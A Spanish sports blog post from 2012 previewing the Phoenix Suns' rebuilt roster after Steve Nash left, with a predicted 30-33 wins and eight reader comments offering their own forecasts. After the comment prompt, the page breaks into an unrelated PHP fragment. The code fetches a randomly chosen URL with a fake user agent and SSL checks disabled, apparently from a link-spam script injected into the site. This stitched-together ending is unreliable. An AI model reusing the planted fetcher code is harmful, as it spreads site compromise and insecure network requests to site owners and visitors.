Phoenix Suns: Travesía por el desierto

10 de October de 2012 por Simon

Se acabó, llegó el fin definitivo de una era. Se marcha el sol que más ha iluminado Arizona en la última década.  Atrás quedan temporadas de más de 60 victorias, dos MVP y probablemente uno de los equipos que más nos ha entretenido en la historia de la NBA. Poco a poco durante el último lustro este equipo se ha ido desmembrando y el último en abandonar el barco ha sido el capitán. Steve Nash no volverá a jugar en Phoenix Suns.

Pero desde los despachos de Phoenix no se quedaron añorando tiempos más felices sino que se movieron rápido. Descartada una reconstrucción vía draft y ante la imposibilidad de firmar otra estrella, optaron por una reconstrucción intermedia, fichando veteranos curtidos en mil batallas que pudieran ayudar mucho como Luis Scola o Jermaine O´Neal, y gente joven con buenas maneras pero que aún no han explotado, como Michael Beasley, Wesley Johnson o Goran Dragic. Este último vuelve a casa tras dos temporadas fuera de Phoenix. Lástima que les fallara el fichaje de Eric Gordon, pues habrían juntado un grupo más que interesante y preparado para competir desde ya. Vía draft, con el número 13, llega un base puro como es Kendall Marshall, procedente de North Carolina, una apuesta en toda regla por un estilo de juego continuista.

Así pues, el puesto de base titular será  para el esloveno Dragic, que el año pasado aprovechó la baja de Lowry en Houston para terminar muy bien la temporada y firmar un buen contrato. Gran tirador de 3 puntos, aunque algo irregular, no es un playmaker al uso pero repartirá bastante juego entre sus compañeros. Será  una buena temporada para Dragic, que llevará todas las riendas del equipo, también gozará de minutos de escolta si la apuesta del draft, Kendall Marshall, confirma que puede ser un base consistente al máximo nivel. De momento, la apuesta de la franquicia por Dragic lo relega al banquillo. Telfair aportará experiencia como tercer base.

En las alas, el puesto de escolta titular es el que más dudas crea pero apuesto por que en principio será para Jared Dudley, que ya jugó en esta posición el año pasado aunque su posición natural sería la de alero. Otro gran tirador aunque incapaz de crearse su propio tiro, aportará intensidad y esfuerzo defensivo. El escolta suplente será Shannon Brown, el súper atlético jugador de Phoenix que verá mermados sus minutos ante la posibilidad de que tanto Wes Johnson como Goran Dragic puedan ver minutos en el puesto de escolta.

La gran apuesta de Phoenix llega desde Minnesota. El  alero Michael Beasley disputará minutos de 3 y de 4. Será la primera vez en su carrera en que le darán total libertad  para asumir el rol de “estrella”. Ahora se descubrirá si Beasley puede ser un jugador de la zona noble de la liga, se queda en un simple buen jugador o se une al club de tantos y tantos jugadores con talento desaprovechado. La situación para Beasley es inmejorable. Con galones y confianza, sin nadie que en principio pueda estorbarle y con un puntito más de madurez debería mostrar todo su potencial y centrarse en el juego.  También desde los Wolves llega Wesley Johnson, que llegó con un buen cartel a la liga que no ha refrendado en ningún momento. Muy inconsistente, sin una gran progresión desde que llegó a la NBA, puede empezar a mostrar algo en Arizona. En su contra jugará el hecho de que parece abocado a disputar muchos minutos como escolta a pesar de que ha rendido mejor de alero. A su favor, que Phoenix va a dar muchas oportunidades a los jovencitos.

El “4” titular será el mejor jugador del equipo, Luis Scola. Tras la amnistía que le aplicó Houston todos esperábamos verlo en un contender, pues ese es el verdadero nivel del bueno de Scola, pero finalmente dio con sus huesos en Phoenix, que fueron los que más pujaron. Lejos de desmotivarse, seguro que dará lo mejor de sí y asumirá su rol en esta franquicia, la de ser un líder dentro y fuera de la cancha. Seguro ayudará y enseñará muchísimo a los jóvenes de Phoenix. Su gran juego de espaldas puede servir de mucho a Michael Beasley, el cual podría aprender de uno de los jugadores que más domina en este apartado del juego en toda la liga. El 4 suplente será Markieff Morris, otro que podría aprender del juego de espaldas de Scola. Puede ser un buen jugador en el futuro pero aún está muy verde.

El center titular será el polaco Marcin Gortat, un jugador al que seguro todos estamos queriendo ver jugar sin Nash al lado. ¿Será capaz de mantener su nivel o sin Nash poniéndoselas a huevo se diluirá como un azucarillo? Lo que es seguro es que será  el eje principal de la defensa de Phoenix y reboteará como siempre. La única duda que surge con Gortat es su capacidad de crear su propio tiro.  El center suplente será un Jermaine O´Neal al que las lesiones tienen bastante mermado y no creo que pueda aportar mucho más que experiencia. Channing Frye es baja indefinida por unos problemas cardiacos.

En definitiva, tienen buenos jugadores en todos los puestos, el banquillo tiene un razonable buen nivel, pero no tienen ningún jugador capaz de desequilibrar los partidos él solo. Este año sufrirán muchas derrotas pero seguro que sus jugadores nos divierten mucho a la vez que crecen en su juego. Competirán pero lejos de los puestos de  PO.

Quinteto: Gorad Dragic, Jared Dudley, Michael Beasley, Luis Scola, Marcin Gortat
Sexto Hombre: Wesley Johnson

Pronóstico: Entre 30-33 victorias

Comenta

8 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Yo les veo ligeramente mejor en cuanto a victorias, peleando por los Playoffs, décimos como muy mal resultado. 40-42 es mi porra para los Suns. El quinteto está muy bien, Dragic y Scola se conocen de Houston y funcionan bastante bien, y además el esloveno puede hacer jugar a Gortat, que necesita buenos pases, pero en general se coloca bien para obtener buenos lanzamientos y en defensa lo hace bastante bien también. A ver qué tal resultado da Marshall, y después lógicamente se trata de ver si Beasley puede guiar al equipo, que yo creo que no. Esos dos fichajes de Beasley y Wes, yo particularmente no les encuentro el sentido, porque han demostrado ser muy inconstantes en Minnesota, y no creo que cambie ahora en Phoenix…

      Citar

  2. GreenPride dice:
    #2

    Equipo renovado totalmente en Phoenix y adiós al genio que los ha guiado durante tanto tiempo. Ahora toca renovarse y la apuesta de este año de los Suns es atractiva. Buenos jugadores en cada puesto si la química del equipo es buena pueden dar más de una sorpresa. Yo también les veo fuera de PO aunque como Sancho les doy un número de victorias cercano al 50%. Año decisivo para jugadores que deben explotar definitivamente como Dragic y (sobre todo) Beasley.

      Citar

  3. Heineken dice:
    #3

    Por lo menos intentan la reconstrucción, tienes un poco de todo, veteranos que aportaran lo suyo, jóvenes en franca progresión, jóvenes estancados y de los marcados siempre con la frase “tiene mucho potencial”, jóvenes incógnita… creo que las cabezas de los ex-wolves marcaran mucho la temporada de este equipo, Beasley centrándose y Wes Johnson creyéndose de una vez que esta en la NBA y no en la Universidad, tiene que dar un paso adelante y dejar de andar tan “cohibido” por la pista, que parece que le da miedo hacer cualquier cosa.

    A mi me gusta este equipo. Les doy entre 43 y 46 victorias

      Citar

  4. TheDeerHunter dice:
    #4

    Tienen un poco de todo, pero es un proyecto demasiado nuevo, mutado desde los cimientos. El Oeste no va a perdonar nada.
    No creo que lleguen a las 35 victorias.

      Citar

  5. Denise dice:
    #5

    Yo los veo fuera de Playoffs, perome gusta la composicion del equipo excepto Wesley y Beasley.. En el Este tendrían sus opciones, pero el Oeste es mucho Oeste.

    Me juego 1000 euros a que Gortat mantiene la linea del año pasado aun sin Nash. Sus numeros en anotacion quizas disminuyan porque hay mas armas ofensivas que el año pasado con Dragic, Scola y Beasley que se chupará bastantes tiros. Pero en general, pronostico otro temporadon del polaco.

    Otro jugador a tener en cuenta es Morris. No sé si acabará siendo un 3, o acabará siendo un 4, pero esos jugadores a lo Thadeus Young me gustan para tenerlo en mi equipo.

    Pronóstico: 37-45 fuera de playoffs

      Citar

  6. nba dice:
    #6

    Yo creo que quedaran terceros por la cola en el Oeste, salvo que Channing se recupere y pueda disputar la temporada.
    Aunque Scola-Dragic-Gortat-Beasley son un grupo interesante de jugadores, el Oeste va a ser un territorio lleno de minas para este equipo en reconstruccion post-Nash

      Citar

  7. melo15 dice:
    #7

    37 victorias? Lo dudo y menos jugando en el Oeste, yo no los veo superiores a los Kings y bastante peores que Warriors o Jazz. A mi gente como Dragic o Dudley me generan muchas dudas, porque el primero creo que estuvo jugando muy bien 3 meses pero nose si va a dar otra vez el nivel de un base titular y el segunda como ya habeis dicho no se sabe crear tiros y este año no estara Nash para pasarsela. Del que no tengo tantas dudas es de Beasley, creo que todos sabemos lo que puede hacer jugando 30 minutos, 20pp con porcentages justos y nula intesidad. Tampoco me fio de Gortat, puede que mantenga el nivel defensivo y reboteador pero no el ofensivo.
    Yo les doy 30 victorias.

      Citar

  8. kabom dice:
    #8

    30 – 35 victorias. Me da que Dragic no es muy regular, Scola será profesional pero no va a repetir sus numeros de Houston, me gustaría que B-easy explotase de una vez y Johnson seguirá siendo una nada, no le veo carácter.
    Gortat y Dudley seguirán a lo suyo, son los únicos que creo que mantendrán su nivel por buenos defensores y ser regulares. Tengo ganas de ver a Marshall, puede ser un gran base distribuidor y tiene buena pinta.
    Pero es el Oeste. Así que les toca, creo, dar confianza a los nuevos y crear equipo con un par de drafts más

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>